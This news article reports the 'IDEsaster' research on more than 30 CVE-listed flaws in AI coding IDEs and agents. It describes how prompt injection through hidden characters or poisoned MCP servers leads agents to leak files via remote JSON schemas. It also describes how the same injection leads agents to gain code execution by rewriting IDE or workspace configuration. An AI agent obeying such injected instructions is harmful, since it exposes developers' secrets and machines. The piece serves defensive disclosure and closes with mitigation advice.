Image Main

A recent investigation has revealed more than 30 security vulnerabilities in several Integrated Development Environments (IDEs) powered by artificial intelligence (AI). These flaws, collectively called “IDEsaster”, combine prompt injection primitives with legitimate IDE features to achieve data exfiltration and remote code execution (RCE).

Security researcher Ari Marzouk (MaccariTA) discovered that the vulnerabilities affect popular IDEs and extensions such as Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie and Cline, among others. Of these, 24 vulnerabilities have been given CVE identifiers.

The IDEsaster attack chain

The research highlights that AI IDEs and coding assistants underestimate the security risks when integrating autonomous AI agents. The “IDEsaster” attack chains three main vectors:

  1. LLM Guardrails Bypass: Prompt injection is used to hijack the large language model (LLM) context and force it to execute the attacker’s instructions.
  2. Self-approved tool calls: The AI ​​agent performs actions without requiring user interaction, using tool calls that are configured to self-approve.
  3. Abuse of legitimate IDE features: The attacker exploits normal IDE features to break the security boundary, allowing leakage of sensitive data or execution of arbitrary commands.

Unlike previous attacks that abused vulnerable tools, IDEsaster uses prompt injection to activate legitimate features of the IDE.

Context Hijacking Methods and Attack Examples

Context hijacking can be achieved in several ways, such as including external references (URLs, pasted text) with hidden characters invisible to the human eye, but parsable by the LLM. It can also occur by poisoning the Model Context Protocol (MCP) via “rug pulls” or when a legitimate MCP server processes attacker-controlled input from an external source.

Specific attacks identified include:

  • Data exfiltration via remote JSON: An attacker uses prompt injection to read a sensitive file with tools such as read_file or search_files. It then writes a JSON file with a legitimate tool (write_file or edit_file) that includes a remote JSON schema hosted on a malicious domain. When the IDE processes this file, it makes a GET request to the attacker’s domain, exfiltrating the data.
    • CVEs affected: CVE-2025-49150 (Cursor), CVE-2025-53097 (Roo Code), CVE-2025-58335 (JetBrains Junie), GitHub Copilot, Kiro.dev, Claude Code.
  • Remote Code Execution (RCE) via IDE Configuration: Prompt injection is used to edit IDE configuration files (for example, .vscode/settings.json or .idea/workspace.xml). By modifying parameters such as php.validate.executablePath or PATH_TO_GIT to point to a malicious executable, RCE is achieved when starting the environment or the specific tool.
    • CVEs affected: CVE-2025-53773 (GitHub Copilot), CVE-2025-54130 (Cursor), CVE-2025-53536 (Roo Code), CVE-2025-55012 (Zed.dev), Claude Code.
  • RCE via workspace configuration: Prompt injection is used to edit workspace configuration files (*.code-workspace) and unconfigure a multi-root workspace, achieving RCE.
    • CVEs affected: CVE-2025-64660 (GitHub Copilot), CVE-2025-61590 (Cursor), CVE-2025-58372 (Roo Code).

These RCE attacks often rely on the AI ​​agent to auto-approve file writes, a default behavior for files within the workspace.

Recommendations and a new paradigm: “Secure for AI”

Marzouk highlights the need for a new security paradigm called “Secure for AI,” which seeks to address emerging risks by integrating AI components into existing products.

Recommendations for developers:

  • Apply the principle of least privilege to LLM tools.
  • Minimize prompt injection vectors and harden the system prompt.
  • Use sandboxing to execute commands.
  • Perform extensive security testing against route manipulation, information leakage, and command injection.

Recommendations for users:

  • Use AI IDEs and AI agents only with trusted projects and files.
  • Manually review added sources (e.g. URLs) for hidden instructions (such as HTML comments or invisible Unicode characters).
  • Continuously monitor trusted MCP servers, as even a trusted server can be compromised.

Conclusions

The findings from “IDEsaster” demonstrate how AI tools, by failing to distinguish between user instructions and malicious external content, expand the attack surface of development machines. Integrating AI agents into existing applications (such as IDEs or CI/CD pipelines) introduces new emerging risks that require a proactive and adapted security approach.

References

  • CVE-2025-49150 (Cursor)
  • CVE-2025-53097 (Roo Code)
  • CVE-2025-58335 (JetBrains Junie)
  • CVE-2025-53773 (GitHub Copilot)
  • CVE-2025-54130 (Cursor)
  • CVE-2025-53536 (Roo Code)
  • CVE-2025-55012 (Zed.dev)
  • CVE-2025-64660 (GitHub Copilot)
  • CVE-2025-61590 (Cursor)
  • CVE-2025-58372 (Roo Code)
  • CVE-2025-61260 (OpenAI Codex CLI)